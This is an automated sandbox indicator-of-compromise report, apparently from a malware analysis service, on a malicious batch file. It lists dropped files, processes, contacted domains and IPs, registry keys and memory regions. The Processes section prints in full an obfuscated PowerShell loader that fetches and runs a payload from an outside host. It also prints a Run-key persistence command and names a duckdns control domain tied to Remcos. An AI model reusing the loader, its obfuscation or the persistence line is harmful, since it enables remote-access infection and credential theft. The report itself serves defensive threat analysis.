IOC Report
ZW_PCCE-010023024001.bat

loading gif

Files

File Path
Type
Category
Malicious
ZW_PCCE-010023024001.bat
ASCII text, with very long lines (5980), with no line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kl32ek5g.jjk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mje33vhh.a24.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vaucwujz.b0r.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x45nip12.f4u.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv6BC6.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x5c23815b, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\kywjvrv
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\2BWCY09RDCGF38WA994P.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Trykimprgneredes.Ene
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg aanKendg HeteM sqrsmaleSeedsFosi ');$Grasshopper=viruserne 'Stee$,ommfTrotoNon rg nbwKvalaScotrRdhudUsheeSlamr.outs Une.D sbDS,oroGenfwC nfnAntil,fteoCoc.a SttdCow FBesti Baal rugeK.ok(Drug$AntoNPangeBehauIndukVigt, yk$BedvUUdr nP aspPredrPassoEutanTopfoR.abuEnvynEtagcMe oiLog.nUmodgL,ma)Bard ';$Unpronouncing=$Superdural;Vvningens (viruserne 'Maju$ UhaGMultLJugaoP.enb BhmARedeLschl:monafForbOStorLAndeEPr lnS,mmdTadpETri sFa.b=Util( MinTpur.eMarkspresTPinl-Kr nPHaveaKurvtGlasHCebu Mult$SonnUNonvNSam,PP rsrKu doAarsN ,doO UnfUPapanRaggcImplIComiNErklgMand)Undi ');while (!$Folendes) {Vvningens (viruserne 'S.ne$JerngFilmlOpgaoEjsab joka Lnnl Unh: SpuPMa,erKliteLadipRansa StyrCamoeIn tdGent=Porp$Trafttr.kr ForuSubsetetr ') ;Vvningens $Grasshopper;Vvningens (viruserne ' amfsSquiTO.eraCincRIffitBo g- EliS EgnlInv,EspalEabscpLers Ep.s4Arg. ');Vvningens (viruserne 'bygg$ S vgContLE suOVedfBSc lA icol Leg:JoblFSolboLoyaLForbE L knTrandGyroEUnsesSmed=Ni.r( ,rgtG steChrosInteTHerb- AbsP Tobakartt egeh nmo Arc$Shawu,ejlnArbepInv RAcetoTrevnU saO ur,UfolkNFormCSunli.pronHypeGHype) Haa ') ;Vvningens (viruserne 'Over$pipegSemilGrimOP,eubGingABoutLFors:AyahCC.plOM.ssmUntreUnsclVe dITeloEInjusa meT Pyg=Barf$SkycGLovblorpiogigaB Dama MunLPenn:frembE ideGe tmVninE OpseBrygT Uns+ Skr+Und %Unsu$cultMf jloUnb.STorpa imeiSpanKActuK SecE .lirAnemNSkruEEmer.Te rCDyreO indu AksNMicrT en ') ;$Neuk=$mosaikkerne[$Comeliest];}$Forvrrelser=319177;$synclastic=31223;Vvningens (viruserne 'Sk l$ ootgExcyl omsoS ilbSupeaPertL.ern:LimpKPr.doTrouMNrinMPolyEScopNHeretChapeSe,vRDri EKe,uNW.ipdDub E F rSSvmm Dksl= Kla epidgUncaEEx,itKrse- Kupc ArcOD sinUs,utMurbEOmhunK ontSko. Forh$S igUBillNTes,PHomerBekoo Swan SulOIwarU,entNCounCC vii Komnh stg Bkk ');Vvningens (viruserne ' en$ MalgTreflSkaloSh rbVanda ovel jou:Mrk fStila SvilEncld.elseColor elaeFan b ibsGru t Perr nona rnrplebbpForgeMavesRawl Pro,= ubr Sho[ConvS,arbyInexsCompt InieN.rvm ir.GoneC L.mo ArbnfarmvShodeAnabrAsket Fac]Ra k: iff:TetrFDaasrWateoMes.mPlotBDefia MagsOvereCele6Gree4St,rSGun tT.rnrForfiNot nMantgPal (Brev$TachK G.eoPi pmInh m rabeOptin sv t.eboe RygrGallemarinLinjdVrikeHalvsrdde) nds ');Vvningens (viruserne 'Unde$ ownG urhL ForoAl,sbAutoaLyspLlakf: SetpSagsaSt uTAstme repNTovnTBorieC.ilR StuI.eerNCo ogSkr,el teR friNS alEshudSdeto Dato=Stic Rape[ omfsUnmaYKlimSDiopT.ffieFla.MDem .shoptLommeDobbxSyndtSizz. utaeSmrenIndiC FarObostDPibeI Prenchapgdyre]k mm: nin: aliaCladS TimCLeptICaprIF rb.RiddGFlorE,lketFredSIntetMat.RTemiIC,rynKlamGinve(Non,$ UnrfCoonAPostLSepaDUnpreSygdRMumme CarbEnqus svat Smar JenAKal PCyclpklunE rots Oks)Broa ');Vvningens (viruserne ' S l$Be.oGW.teLfsteoK,tyBFrieaMu,eLGr m: KrueS btU Bkbr FreyBeerA BrdlTa tePaaka,eboN N,u=s.aa$Corop BalaNidstSavle ,ejnMiniTCr nESalvROsmoipelonLoregMotoeTopur H,snPosteVa uS U o.Pasts,eopuCa ib AldSforhT O eRGranI jednSub,gBekn( und$LaboFOncioHonortrilVrespRj aprSundeFil.LCymbs UndENit Rlag ,Ditl$Afd sVedky BluNVe nCCon l innA CedSDe aTS,uliTilscP.zz) Is ');Vvningens $Euryalean;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg aanKendg HeteM sqrsmaleSeedsFosi ');$Grasshopper=viruserne 'Stee$,ommfTrotoNon rg nbwKvalaScotrRdhudUsheeSlamr.outs Une.D sbDS,oroGenfwC nfnAntil,fteoCoc.a SttdCow FBesti Baal rugeK.ok(Drug$AntoNPangeBehauIndukVigt, yk$BedvUUdr nP aspPredrPassoEutanTopfoR.abuEnvynEtagcMe oiLog.nUmodgL,ma)Bard ';$Unpronouncing=$Superdural;Vvningens (viruserne 'Maju$ UhaGMultLJugaoP.enb BhmARedeLschl:monafForbOStorLAndeEPr lnS,mmdTadpETri sFa.b=Util( MinTpur.eMarkspresTPinl-Kr nPHaveaKurvtGlasHCebu Mult$SonnUNonvNSam,PP rsrKu doAarsN ,doO UnfUPapanRaggcImplIComiNErklgMand)Undi ');while (!$Folendes) {Vvningens (viruserne 'S.ne$JerngFilmlOpgaoEjsab joka Lnnl Unh: SpuPMa,erKliteLadipRansa StyrCamoeIn tdGent=Porp$Trafttr.kr ForuSubsetetr ') ;Vvningens $Grasshopper;Vvningens (viruserne ' amfsSquiTO.eraCincRIffitBo g- EliS EgnlInv,EspalEabscpLers Ep.s4Arg. ');Vvningens (viruserne 'bygg$ S vgContLE suOVedfBSc lA icol Leg:JoblFSolboLoyaLForbE L knTrandGyroEUnsesSmed=Ni.r( ,rgtG steChrosInteTHerb- AbsP Tobakartt egeh nmo Arc$Shawu,ejlnArbepInv RAcetoTrevnU saO ur,UfolkNFormCSunli.pronHypeGHype) Haa ') ;Vvningens (viruserne 'Over$pipegSemilGrimOP,eubGingABoutLFors:AyahCC.plOM.ssmUntreUnsclVe dITeloEInjusa meT Pyg=Barf$SkycGLovblorpiogigaB Dama MunLPenn:frembE ideGe tmVninE OpseBrygT Uns+ Skr+Und %Unsu$cultMf jloUnb.STorpa imeiSpanKActuK SecE .lirAnemNSkruEEmer.Te rCDyreO indu AksNMicrT en ') ;$Neuk=$mosaikkerne[$Comeliest];}$Forvrrelser=319177;$synclastic=31223;Vvningens (viruserne 'Sk l$ ootgExcyl omsoS ilbSupeaPertL.ern:LimpKPr.doTrouMNrinMPolyEScopNHeretChapeSe,vRDri EKe,uNW.ipdDub E F rSSvmm Dksl= Kla epidgUncaEEx,itKrse- Kupc ArcOD sinUs,utMurbEOmhunK ontSko. Forh$S igUBillNTes,PHomerBekoo Swan SulOIwarU,entNCounCC vii Komnh stg Bkk ');Vvningens (viruserne ' en$ MalgTreflSkaloSh rbVanda ovel jou:Mrk fStila SvilEncld.elseColor elaeFan b ibsGru t Perr nona rnrplebbpForgeMavesRawl Pro,= ubr Sho[ConvS,arbyInexsCompt InieN.rvm ir.GoneC L.mo ArbnfarmvShodeAnabrAsket Fac]Ra k: iff:TetrFDaasrWateoMes.mPlotBDefia MagsOvereCele6Gree4St,rSGun tT.rnrForfiNot nMantgPal (Brev$TachK G.eoPi pmInh m rabeOptin sv t.eboe RygrGallemarinLinjdVrikeHalvsrdde) nds ');Vvningens (viruserne 'Unde$ ownG urhL ForoAl,sbAutoaLyspLlakf: SetpSagsaSt uTAstme repNTovnTBorieC.ilR StuI.eerNCo ogSkr,el teR friNS alEshudSdeto Dato=Stic Rape[ omfsUnmaYKlimSDiopT.ffieFla.MDem .shoptLommeDobbxSyndtSizz. utaeSmrenIndiC FarObostDPibeI Prenchapgdyre]k mm: nin: aliaCladS TimCLeptICaprIF rb.RiddGFlorE,lketFredSIntetMat.RTemiIC,rynKlamGinve(Non,$ UnrfCoonAPostLSepaDUnpreSygdRMumme CarbEnqus svat Smar JenAKal PCyclpklunE rots Oks)Broa ');Vvningens (viruserne ' S l$Be.oGW.teLfsteoK,tyBFrieaMu,eLGr m: KrueS btU Bkbr FreyBeerA BrdlTa tePaaka,eboN N,u=s.aa$Corop BalaNidstSavle ,ejnMiniTCr nESalvROsmoipelonLoregMotoeTopur H,snPosteVa uS U o.Pasts,eopuCa ib AldSforhT O eRGranI jednSub,gBekn( und$LaboFOncioHonortrilVrespRj aprSundeFil.LCymbs UndENit Rlag ,Ditl$Afd sVedky BluNVe nCCon l innA CedSDe aTS,uliTilscP.zz) Is ');Vvningens $Euryalean;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
rj0987654321.duckdns.org
malicious
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
unknown
http://www.imvu.comr
unknown
http://crl.microsoft
unknown
https://aefd.nelreports.net/api/report?cat=bingth
unknown
https://contoso.com/License
unknown
http://geoplugin.net/json.gp1
unknown
http://geoplugin.net/json.gp_G
unknown
http://www.imvu.coma
unknown
https://aefd.nelreports.net/api/report?cat=bingaotak
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
unknown
https://www.google.com
unknown
https://aka.ms/pscore6lB
unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://ethys.ro/
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://ethys.ro
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
unknown
https://ethys.ro/Nonaddicting.qxd
81.180.144.124
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://ethys.ro
unknown
http://geoplugin.net/json.gphy
unknown
http://www.imvu.com
unknown
https://aefd.nelreports.net/api/report?cat=wsb
unknown
https://contoso.com/Icon
unknown
http://geoplugin.net/json.gpt
unknown
https://ethys.ro/Nonaddicting.qxdP
unknown
https://github.com/Pester/Pester
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://ethys.ro/3/tVWTkim99.binT
unknown
https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
unknown
https://ethys.ro/3/tVWTkim99.bin
81.180.144.124
http://www.nirsoft.netUJL
unknown
http://geoplugin.net/
unknown
https://aefd.nelreports.net/api/report?cat=bingaot
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
unknown
https://aefd.nelreports.net/api/report?cat=bingrms
unknown
https://www.google.com/accounts/servicelogin
unknown
https://aka.ms/pscore68
unknown
http://geoplugin.net/r
unknown
https://ethys.ro/Nonaddicting.qxdXRyl
unknown
http://www.ebuddy.com
unknown
There are 44 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
rj0987654321.duckdns.org
193.187.91.212
malicious
ethys.ro
81.180.144.124
geoplugin.net
178.237.33.50
s-part-0017.t-0009.fb-t-msedge.net
13.107.253.45

IPs

IP
Domain
Country
Malicious
193.187.91.212
rj0987654321.duckdns.org
Sweden
malicious
81.180.144.124
ethys.ro
Romania
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Millihenries
Scuttock
HKEY_CURRENT_USER\Environment
Mirko
HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2
time
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Startup key
There are 13 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
A606000
direct allocation
page execute and read and write
malicious
8A49000
heap
page read and write
malicious
8A23000
heap
page read and write
malicious
8A47000
heap
page read and write
malicious
5BCA000
trusted library allocation
page read and write
malicious
8A47000
heap
page read and write
malicious
13F90071000
trusted library allocation
page read and write
malicious
8A47000
heap
page read and write
malicious
8A47000
heap
page read and write
malicious
8A44000
heap
page read and write
malicious
8A23000
heap
page read and write
malicious
8980000
direct allocation
page execute and read and write
malicious
8A23000
heap
page read and write
malicious
8A47000
heap
page read and write
malicious
8A47000
heap
page read and write
malicious
8A49000
heap
page read and write
malicious
8A23000
heap
page read and write
malicious
8A23000
heap
page read and write
malicious
8A47000
heap
page read and write
malicious
8A23000
heap
page read and write
malicious
48C0000
trusted library allocation
page read and write
2698000
heap
page read and write
71DC000
stack
page read and write
4A9E000
heap
page read and write
4A9C000
heap
page read and write
13FE9770000
trusted library allocation
page read and write
721D000
stack
page read and write
C98000
stack
page read and write
9CE000
stack
page read and write
9DA000
heap
page read and write
43B8000
heap
page read and write
26A6000
heap
page read and write
43B8000
heap
page read and write
8990000
trusted library allocation
page read and write
3010000
trusted library allocation
page read and write
54F000
stack
page read and write
8A99000
heap
page read and write
43B8000
heap
page read and write
43B8000
heap
page read and write
7090000
direct allocation
page read and write
B4470D000
stack
page read and write
934000
heap
page read and write
8AAB000
heap
page read and write
43AF000
heap
page read and write
4991000
heap
page read and write
543E000
trusted library allocation
page read and write
9BE000
stack
page read and write
4FF7000
heap
page read and write
43B6000
heap
page read and write
4AF6000
heap
page read and write
13F81DA5000
trusted library allocation
page read and write
2FE0000
trusted library allocation
page read and write
13FE7EC0000
heap
page read and write
3360000
heap
page read and write
75BB000
heap
page read and write
2681000
heap
page read and write
456000
system
page execute and read and write
4AF6000
heap
page read and write
4A98000
heap
page read and write
934000
heap
page read and write
13FEA12D000
heap
page read and write
4AF6000
heap
page read and write
13F81DA9000
trusted library allocation
page read and write
25AA7000
heap
page read and write
2630000
heap
page read and write
3269000
heap
page read and write
2638000
heap
page read and write
3000000
trusted library allocation
page read and write
25AA3000
heap
page read and write
2677000
heap
page read and write
7FF8879D4000
trusted library allocation
page read and write
43A9000
heap
page read and write
9D7000
heap
page read and write
2FD0000
trusted library allocation
page read and write
7FF887CB0000
trusted library allocation
page read and write
3050000
heap
page readonly
321E000
heap
page read and write
90D0000
direct allocation
page execute and read and write
7FF887BE0000
trusted library allocation
page read and write
2675000
heap
page read and write
44C0000
heap
page read and write
53C000
stack
page read and write
934000
heap
page read and write
43B8000
heap
page read and write
3384000
heap
page read and write
4AF6000
heap
page read and write
267C000
heap
page read and write
245F8000
heap
page read and write
4AF6000
heap
page read and write
43B5000
heap
page read and write
8A01000
heap
page read and write
8A9B000
heap
page read and write
13FEA176000
heap
page read and write
4ED9000
heap
page read and write
F20000
trusted library section
page read and write
752E000
heap
page read and write
53EB000
trusted library allocation
page read and write
26A6000
heap
page read and write
83E0000
trusted library allocation
page read and write
7FF887CA0000
trusted library allocation
page read and write
8A8C000
heap
page read and write
4AB6000
heap
page read and write
2A3F000
stack
page read and write
2651000
heap
page read and write
338D000
heap
page read and write
4A99000
heap
page read and write
B4478B000
stack
page read and write
2698000
heap
page read and write
305D000
heap
page read and write
43A8000
heap
page read and write
870F000
heap
page read and write
13F81D99000
trusted library allocation
page read and write
13FEA1FA000
heap
page read and write
13F80BB8000
trusted library allocation
page read and write
4A99000
heap
page read and write
934000
heap
page read and write
2FC0000
trusted library section
page read and write
2694000
heap
page read and write
8A10000
direct allocation
page read and write
23E5000
heap
page read and write
8400000
trusted library allocation
page read and write
7278000
heap
page read and write
2F50000
heap
page read and write
43BA000
heap
page read and write
739E000
stack
page read and write
24020000
remote allocation
page read and write
2698000
heap
page read and write
13FE9F51000
heap
page read and write
840000
heap
page read and write
7FF887D10000
trusted library allocation
page read and write
83D0000
trusted library allocation
page read and write
ACD000
stack
page read and write
7260000
heap
page read and write
